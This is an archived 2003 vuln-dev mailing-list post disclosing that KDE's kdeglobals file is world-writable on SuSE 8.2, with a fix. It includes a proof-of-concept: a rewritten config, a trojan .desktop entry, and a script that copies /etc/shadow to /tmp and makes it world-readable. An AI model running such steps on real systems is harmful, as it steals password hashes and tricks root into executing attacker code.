KDE 3.1 - Suse 8.2 - kdeglobals world writable

From: Martin Fallon (mar_fallon_at_yahoo.com.br)
Date: 11/14/03

Next message: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"

Previous message: Nicob: "Re: thttpd-2.24"
Next in thread: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"
Reply: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Fri, 14 Nov 2003 13:33:25 -0300 (ART)
To: vuln-dev@securityfocus.com

Hi, Mrs.!

I have found one problem in suse 8.2 with KDE 3.1
(default instalation in brazilian version). The
configurarion file "kdeglobals" in
/etc/opt/kde3/share/config is world writable.

One attacker can exploit this vulnerability
with many ways.

One basic example of attack is:

I - Overwrite de kdeglobals file with contents
below:

#
# written by SuSEconfig.kde
#
[Locale]
Country=pt
Language=pt:BR

#Abaixo jah alterados.

[Paths]
Desktop=/tmp/Desktop

II - Create folder /tmp/Desktop e one trojan
horse in some file .desktop inside then. Example:

glaudson@suse:/tmp/Desktop> cat xpdf.desktop
[Desktop Entry]
Exec=/tmp/AutoStart/teste.sh
Icon=gv
TerminalOptions=
Path=
Type=Application
Terminal=0
X-KDE-StartupNotify=false
glaudson@suse:/tmp/Desktop>

II - Create file to execute /tmp/Autostart/teste.sh
with backdoor/trojan/spyware/malware code.Example:

glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh
#!/bin/bash
cp /etc/shadow /tmp/shadow
chmod 0777 /tmp/shadow

The icon "xpdf" will be appear in root's desktop.
If root run de icon, he run the trojan horse and
attack will be succeded.

There are many other forms for exploit this bug.

Solution:

chmod 0500 /etc/opt/kde3/share/config/kdeglobals
or
rm -rf /etc/opt/kde3/share/config/kdeglobals

There are again other files world writable
in suse 8.2(brazilian version):

glaudson@suse:/tmp/Desktop> find /etc/opt -perm -2 !
\( -type l -o -type c -o -type s -o -perm -1000 \)
/etc/opt/kde3/share/config/kmailrc
/etc/opt/kde3/share/config/kioslaverc
/etc/opt/kde3/share/config/kdeglobals.SuSEconfig
/etc/opt/kde3/share/config/kdeglobals
find: /etc/opt/kde3/share/servicetypes: Permissão
negada

glaudson@suse:/tmp/Desktop> cat /etc/SuSE-release
SuSE Linux 8.2 (i586)
VERSION = 8.2
glaudson@suse:/tmp/Desktop> cat /proc/version
Linux version 2.4.20-4GB-athlon (root@Athlon.suse.de)
(gcc version 3.3 20030226 (prerelease) (SuSE Linux))
#1 Mon Mar 17 17:56:47 UTC 2003

Best Regards,

Martin Fallon.
Mercenarie's Club
http://cdm.frontthescene.com.br/

______________________________________________________________________

Yahoo! Mail: 6MB, anti-spam e antivírus gratuito! Crie sua conta agora:
http://mail.yahoo.com.br

Next message: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"

Previous message: Nicob: "Re: thttpd-2.24"
Next in thread: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"
Reply: Dirk Mueller: "Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: Novell buying Suse, IBM investing in Novell
... >Suse produces what I regard as the most mature Linux packages. ... but also the attack op propiarty Unix variants. ... IBM may need to kick some Novell butt to keep them from just throwing Suse's ...
(comp.os.vms)
Novell buying Suse, IBM investing in Novell
... I read an article today that Novell is going to buy Suse, ... Suse produces what I regard as the most mature Linux packages. ... but also the attack op propiarty Unix variants. ...
(comp.os.vms)